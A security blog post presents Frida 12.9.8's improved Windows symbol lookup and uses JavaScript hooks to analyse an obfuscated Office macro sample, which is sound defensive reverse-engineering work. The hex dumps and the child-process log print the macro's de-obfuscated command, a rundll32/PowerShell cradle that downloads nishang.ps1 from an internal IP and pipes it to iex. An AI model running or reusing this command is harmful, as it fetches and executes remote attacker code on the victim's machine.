Categories

  • Reverse Engineering

Tags

  • Frida
  • Office Macro Malware

Frida has become more popular recently due to its convenience to install hooks using JavaScript language. I saw many researches using Frida for mobile platform, but it seems like Windows has more usage tractions recently. At DarunGrim, we are researching new methodology that security researchers can use for their day to day work. Frida is one of the tools that, we thought, can be useful for Windows reverse engineering. But, during our testing, we found that the symbol lookup capability was limiting factor in broader use of this tool. We made improvements and it is now available with Frida 12.9.8. We are really thankful to Ole André Vadla Ravnås for his help in merging the changes.

We will go through the change we made briefly and will explain how you can use improved symbol lookup capabilities in real world problem solving.

Frida 12.9.8 Improvements

Basically, Frida uses dbghelp.dll APIs to lookup symbols in Windows platform. But what it lacked was using symbol server support. We added symbol server support and made improvements in passing symbol string in Windows. With older Frida implementation, it took some time to look up each symbol because it was using wildcard module names to lookup any symbols. Now you can specify module names to speed up the symbol lookup.

New Frida will ship with symsrv.dll with dbghelp.dll to support symbol server including Microsoft symbol server.

These are the changes we made with help from Ole.

Case Study: Analyzing Office Macro Behavior

With improved Frida functionality, here’s an Office Macro malware example that we want to apply Frida for deep analysis.

Injection and instrumentation

The following diagram shows how Frida generally install hooks and gets messages from the installed hooks.

There are frida, session, script objects involved in this process to manage hook installations. The hooking callback is written in JavaScript.

The following code shows an example how these objects can be used to install JavaScript hooking code assigned to self.script_text variable to process with process_id variable.

code.py

    def instrument(self, process_id):
        session = frida.attach(process_id)
        self.sessions.append(session)
        session.enable_child_gating()
        script = session.create_script(self.script_text)
        script.on('message', self.on_message)
        script.load()

Symbol Lookup: resolveName

Frida JavaScript APIs are well described in the API documentation.

The first step in using Frida for hooking is finding the target function.

If the function is exported, then you can just call Module.findExportByName method with exported function name with DLL name.

Module.findExportByName(dllName, name)

But, if the function is not exported and it is only recorded in PDB symbol file for example, you can call DebugSymbol.getFunctionByName method. With Frida 12.9.8, you can pass “DLLName!FunctionName” notation for better accuracy in designating specific function and to achieve better performance in locating them.

Loading a symbol for a module can be a slow work sometimes because it might come from remote symbol server. So, you need to call DebugSymbol.load method to initiate the loading of symbols so that we load minimal number of symbols.

Here’s an example code that used Module.findExportByName and DebugSymbol methods to lookup any symbolled or exported functions. It uses dictionary to cache its findings to remove any duplicate works. This can save overall symbol lookup time, if you are hooking enormous number of functions.

vbe.js

var loadedModules = {}
var resolvedAddresses = {}

function resolveName(dllName, name) {
  var moduleName = dllName.split('.')[0]
  var functionName = moduleName + "!" + name

  if (functionName in resolvedAddresses) {
    return resolvedAddresses[functionName]
  }

  log("resolveName " + functionName);
  log("Module.findExportByName " + dllName + " " + name);
  var addr = Module.findExportByName(dllName, name)

  if (!addr || addr.isNull()) {
    if (!(dllName in loadedModules)) {
      log(" DebugSymbol.loadModule " + dllName);

      try {
        DebugSymbol.load(dllName)
      } catch (err) {
        return 0;
      }

      log(" DebugSymbol.load finished");
      loadedModules[dllName] = 1
    }

    try {
      log(" DebugSymbol.getFunctionByName: " + functionName);
      addr = DebugSymbol.getFunctionByName(moduleName + '!' + name)
      log(" DebugSymbol.getFunctionByName: addr = " + addr);
    } catch (err) {
      log(" DebugSymbol.getFunctionByName: Exception")
    }
  }

  resolvedAddresses[functionName] = addr
  return addr
}

Setting Symbol Path

There are different approaches to setup symbol server on Windows environment, we suggest setting _NT_SYMBOL_PATH variable from command line. Symbol path for Windows debuggers has a good description on the usage of the variable.

The following will use “c:\symbols” as its local symbol store to cache official Microsoft symbol server.

setx _NT_SYMBOL_PATH SRV*c:\symbols*https://msdl.microsoft.com/download/symbols

The following command will let the system use default symbol storage directory.

setx _NT_SYMBOL_PATH SRV*https://msdl.microsoft.com/download/symbols

Running Malware and Observing Behavior

We used following sample to test Frida’s improved symbol lookup capability. It has some amount of obfuscations that can be easily analyzed using Frida hooks.

The code we presented here can be found from the following GitHub repository.

Frida.examples.vbe

So, when you launched a Word process and the process id is 3064, the following command can be used to install hooks from vbe.js included in the repository. After installing the hooks, you can open the malicious document to observe its behavior.

> python inject.py -p 3064 vbe.js

resolveName vbe7!rtcShell
Module.findExportByName vbe7 rtcShell
Interceptor.attach: vbe7!rtcShell@0x652a2b76
resolveName vbe7!__vbaStrCat
Module.findExportByName vbe7 __vbaStrCat
 DebugSymbol.loadModule vbe7
 DebugSymbol.load finished
 DebugSymbol.getFunctionByName: vbe7!__vbaStrCat
 DebugSymbol.getFunctionByName: addr = 0x651e53e6
Interceptor.attach: vbe7!__vbaStrCat@0x651e53e6
resolveName vbe7!__vbaStrComp
Module.findExportByName vbe7 __vbaStrComp
 DebugSymbol.getFunctionByName: vbe7!__vbaStrComp
 DebugSymbol.getFunctionByName: addr = 0x651e56a2
Interceptor.attach: vbe7!__vbaStrComp@0x651e56a2
resolveName vbe7!rtcCreateObject
Module.findExportByName vbe7 rtcCreateObject
Interceptor.attach: vbe7!rtcCreateObject@0x653e6e4c
resolveName vbe7!rtcCreateObject2
Module.findExportByName vbe7 rtcCreateObject2
Interceptor.attach: vbe7!rtcCreateObject2@0x653e6ece
resolveName vbe7!CVbeProcs::CallMacro
Module.findExportByName vbe7 CVbeProcs::CallMacro
 DebugSymbol.getFunctionByName: vbe7!CVbeProcs::CallMacro
 DebugSymbol.getFunctionByName: addr = 0x6529019b
Interceptor.attach: vbe7!CVbeProcs::CallMacro@0x6529019b
resolveName oleaut32!DispCallFunc
Module.findExportByName oleaut32 DispCallFunc
Interceptor.attach: oleaut32!DispCallFunc@0x747995b0
[!] Ctrl+D on UNIX, Ctrl+Z on Windows/cmd.exe to detach from instrumented program.

Hooks For Monitoring Office Macro Behavior

The vbe.js has few interesting hooks to monitor behavior of malicious Office documents.

__vbaStrCat

The vbe7.dll is the DLL that has the Visual Basic runtime engine is located. There are tons of interesting functions inside. But firstly, we wanted to observe string de-obfuscation operations

vbe7!__vbaStrCat is the function called when strings are concatenated in Visual Basic.

.text:651E53E6 ; __stdcall __vbaStrCat(x, x)
.text:651E53E6 ___vbaStrCat@8  proc near               ; CODE XREF: _lblEX_ConcatStr↑p

Many Macro-based malware documents use string-based obfuscation. By observing strings concatenation actions, you can observe the constructions of final de-obfuscated strings.

The following hooking code will print out the concatenated strings for each call.

vbe.js

function hookVBAStrCat(moduleName) {
  hookFunction(moduleName, "__vbaStrCat", {
    onEnter: function (args) {
      log("[+] __vbaStrCat")
      // log('[+] ' + name);
      // dumpBSTR(args[0]);
      // dumpBSTR(args[1]);
    },
    onLeave: function (retval) {
      dumpBSTR(retval);
    }
  })
}

This is one example output that shows the final de-obfuscated string.

[+] __vbaStrCat
[+] address: 0x2405009c
length: 328
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  43 00 3a 00 5c 00 57 00 69 00 6e 00 64 00 6f 00  C.:.\.W.i.n.d.o.
00000010  77 00 73 00 5c 00 53 00 79 00 73 00 74 00 65 00  w.s.\.S.y.s.t.e.
00000020  6d 00 33 00 32 00 5c 00 72 00 75 00 6e 00 64 00  m.3.2.\.r.u.n.d.
00000030  6c 00 6c 00 33 00 32 00 2e 00 65 00 78 00 65 00  l.l.3.2...e.x.e.
00000040  20 00 43 00 3a 00 5c 00 55 00 73 00 65 00 72 00   .C.:.\.U.s.e.r.
00000050  73 00 5c 00 74 00 65 00 73 00 74 00 65 00 72 00  s.\.t.e.s.t.e.r.
00000060  5c 00 41 00 70 00 70 00 44 00 61 00 74 00 61 00  \.A.p.p.D.a.t.a.
00000070  5c 00 4c 00 6f 00 63 00 61 00 6c 00 5c 00 54 00  \.L.o.c.a.l.\.T.
00000080  65 00 6d 00 70 00 5c 00 70 00 6f 00 77 00 65 00  e.m.p.\.p.o.w.e.
00000090  72 00 73 00 68 00 64 00 6c 00 6c 00 2e 00 64 00  r.s.h.d.l.l...d.
000000a0  6c 00 6c 00 2c 00 6d 00 61 00 69 00 6e 00 20 00  l.l.,.m.a.i.n. .
000000b0  2e 00 20 00 7b 00 20 00 49 00 6e 00 76 00 6f 00  .. .{. .I.n.v.o.
000000c0  6b 00 65 00 2d 00 57 00 65 00 62 00 52 00 65 00  k.e.-.W.e.b.R.e.
000000d0  71 00 75 00 65 00 73 00 74 00 20 00 2d 00 75 00  q.u.e.s.t. .-.u.
000000e0  73 00 65 00 62 00 20 00 68 00 74 00 74 00 70 00  s.e.b. .h.t.t.p.
000000f0  3a 00 2f 00 2f 00 31 00 39 00 32 00 2e 00 31 00  :././.1.9.2...1.
00000100  36 00 38 00 2e 00 31 00 30 00 2e 00 31 00 30 00  6.8...1.0...1.0.
00000110  30 00 3a 00 38 00 30 00 38 00 30 00 2f 00 6e 00  0.:.8.0.8.0./.n.
00000120  69 00 73 00 68 00 61 00 6e 00 67 00 2e 00 70 00  i.s.h.a.n.g...p.
00000130  73 00 31 00 20 00 7d 00 20 00 5e 00 7c 00 20 00  s.1. .}. .^.|. .
00000140  69 00 65 00 78 00 3b 00                          i.e.x.;.

Here’s another example that shows how “WScript.Shell” string is constructed from obfuscated strings.

[+] __vbaStrCat
[+] address: 0x23fa653c
length: 14
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  69 00 70 00 74 00 2e 00 53 00 68 00 65 00        i.p.t...S.h.e.
[+] __vbaStrCat
[+] address: 0x188e2624
length: 8
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  26 00 48 00 36 00 63 00                          &.H.6.c.
[+] __vbaStrCat
[+] address: 0xe5b82a4
length: 16
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  69 00 70 00 74 00 2e 00 53 00 68 00 65 00 6c 00  i.p.t...S.h.e.l.
[+] __vbaStrCat
[+] address: 0x23fa6e24
length: 8
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  26 00 48 00 36 00 63 00                          &.H.6.c.
[+] __vbaStrCat
[+] address: 0x23fa6a8c
length: 18
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  69 00 70 00 74 00 2e 00 53 00 68 00 65 00 6c 00  i.p.t...S.h.e.l.
00000010  6c 00                                            l.
[+] __vbaStrCat
[+] address: 0xe5b82a4
length: 26
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  57 00 53 00 63 00 72 00 69 00 70 00 74 00 2e 00  W.S.c.r.i.p.t...
00000010  53 00 68 00 65 00 6c 00 6c 00                    S.h.e.l.l.

rtcCreateObject2

One of the many behaviors that malicious Macro shows is creating objects to perform system operations. The function that performs this action is rtcCreateObject2.

.text:653E6ECE ; int __stdcall rtcCreateObject2(int, LPCOLESTR szUserName, wchar_t *Str2)
.text:653E6ECE                 public _rtcCreateObject2@8
.text:653E6ECE _rtcCreateObject2@8 proc near           ; DATA XREF: .text:off_651D379C↑o

This rtcCreateObject2 function is called when new objects are created in VB engine.

The following hook monitors args[2] argument (wchar_t *Str2), which contains the object name it creates.

vbe.js

function hookRtcCreateObject2(moduleName) {
  hookFunction(moduleName, "rtcCreateObject2", {
    onEnter: function (args) {
      log('[+] rtcCreateObject2');
      dumpAddress(args[0]);
      dumpBSTR(args[1]);
      log(ptr(args[2]).readUtf16String())
    },
    onLeave: function (retval) {
      dumpAddress(retval);
    }
  })
}

The example session showed CreateObject method creating WScript.Shell object. This object is used to run external commands from the script. We can expect that this script will run external malicious command.

[+] rtcCreateObject2
[+] address: 0xef66dc
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000010  a4 82 5b 0e 8c 6a fa 23 74 85 5b 0e 8c 67 ef 00  ..[..j.#t.[..g..
00000020  fa 17 be 1b 8c 67 ef 00 d0 6a 2e 75 e0 f1 c0 0c  .....g...j.u....
00000030  60 91                                            `.
[+] address: 0xe5b82a4
length: 26
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  57 00 53 00 63 00 72 00 69 00 70 00 74 00 2e 00  W.S.c.r.i.p.t...
00000010  53 00 68 00 65 00 6c 00 6c 00                    S.h.e.l.l.

DispCallFunc

One of the interesting API is DispCallFunc function. This function is used to call COM methods. By monitoring this API, we can gain better insights into what the malware is trying to do.

The prototype of the function looks like following.

HRESULT DispCallFunc(
  void       *pvInstance,
  ULONG_PTR  oVft,
  CALLCONV   cc,
  VARTYPE    vtReturn,
  UINT       cActuals,
  VARTYPE    *prgvt,
  VARIANTARG **prgpvarg,
  VARIANT    *pvargResult
);

The 1st argument pvInstance has the pointer to the COM instance and 2nd argument oVft has the offset of the method this function is calling. With some calculations, you can locate the function the COM call will call eventually.

The following is the hook for this function that will print out the actual COM method name and its instructions. Frida has APIs to disassemble instructions and it can be really useful in this case.

function hookDispCall(moduleName) {
  hookFunction(moduleName, "DispCallFunc", {
    onEnter: function (args) {
      log("[+] DispCallFunc")
      var pvInstance = args[0]
      var oVft = args[1]
      var instance = ptr(ptr(pvInstance).readULong());

      log(' instance:' + instance);
      log(' oVft:' + oVft);
      var vftbPtr = instance.add(oVft)
      log(' vftbPtr:' + vftbPtr);
      var functionAddress = ptr(ptr(vftbPtr).readULong())

      loadModuleForAddress(functionAddress)
      var functionName = DebugSymbol.fromAddress(functionAddress)

      if (functionName) {
        log(' functionName:' + functionName);
      }

      dumpAddress(functionAddress);

      var currentAddress = functionAddress
      for (var i = 0; i < 10; i++) {
        try {
          var instruction = Instruction.parse(currentAddress)
          log(instruction.address + ': ' + instruction.mnemonic + ' ' + instruction.opStr)
          currentAddress = instruction.next
        } catch (err) {
          break
        }
      }
    }
  })
}

The following shows the example output that shows a COM method call to wshom.ocx!CWshShell::Run.

[+] DispCallFunc
 instance:0x69901070
 oVft:0x24
 vftbPtr:0x69901094
 functionAddress:0x69906260
 modules.length:133
 wshom.ocx: 0x69900000 147456 C:\Windows\System32\wshom.ocx
  DebugSymbol.loadModule C:\Windows\System32\wshom.ocx
  DebugSymbol.loadModule loadedModuleBase: true
 functionName:0x69906260 wshom.ocx!CWshShell::Run

[+] address: 0x69906260
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  8b ff 55 8b ec 81 ec 5c 08 00 00 a1 b4 52 91 69  ..U....\.....R.i
00000010  33 c5 89 45 fc 8b 45 10 8b 4d 14 8b 55 18 89 85  3..E..E..M..U...
00000020  f8 f7 ff ff 89 8d ec f7 ff ff 89 95 e4 f7 ff ff  ................
00000030  c7 85                                            ..

0x69906260: mov edi, edi
0x69906262: push ebp
0x69906263: mov ebp, esp
0x69906265: sub esp, 0x85c
0x6990626b: mov eax, dword ptr [0x699152b4]
0x69906270: xor eax, ebp
0x69906272: mov dword ptr [ebp - 4], eax
0x69906275: mov eax, dword ptr [ebp + 0x10]
0x69906278: mov ecx, dword ptr [ebp + 0x14]
0x6990627b: mov edx, dword ptr [ebp + 0x18]

Also, you can add device callback, which will monitor the process creation behavior. The following shows the rundll child process is used to run PowerShell using powershdll.dll DLL’s main function to run PowerShell command.

⚡ child_added: Child(pid=6300, parent_pid=3064, origin=spawn, path='C:\\Windows\\System32\\rundll32.exe', argv=['C:\\Windows\\System32\\rundll32.exe', 'C:\\Users\\tester\\AppData\\Local\\Temp\\powershdll.dll,main', '.', '{', 'Invoke-WebRequest', '-useb', 'http://192.168.10.100:8080/nishang.ps1', '}', '^|', 'iex;'], envp=None)

Conclusion

Frida is the most convenient and handy dynamic analysis tool that I ever used on Windows platform. There are WinDbg, OllyDbg and PyKD for advanced reverse engineering. They have their places and usages. But, for really quick and repetitive analysis work, Frida is more than enough and has a powerful capability to dump and to analyze program behavior. With Frida 12.9.8, now we have better symbol handling which will increase overall usability and productivity.

Training Information

DarunGrim is a threat intelligence and knowledge company. We are providing training regarding using Frida for Windows Reverse Engineering. Please contact us for details.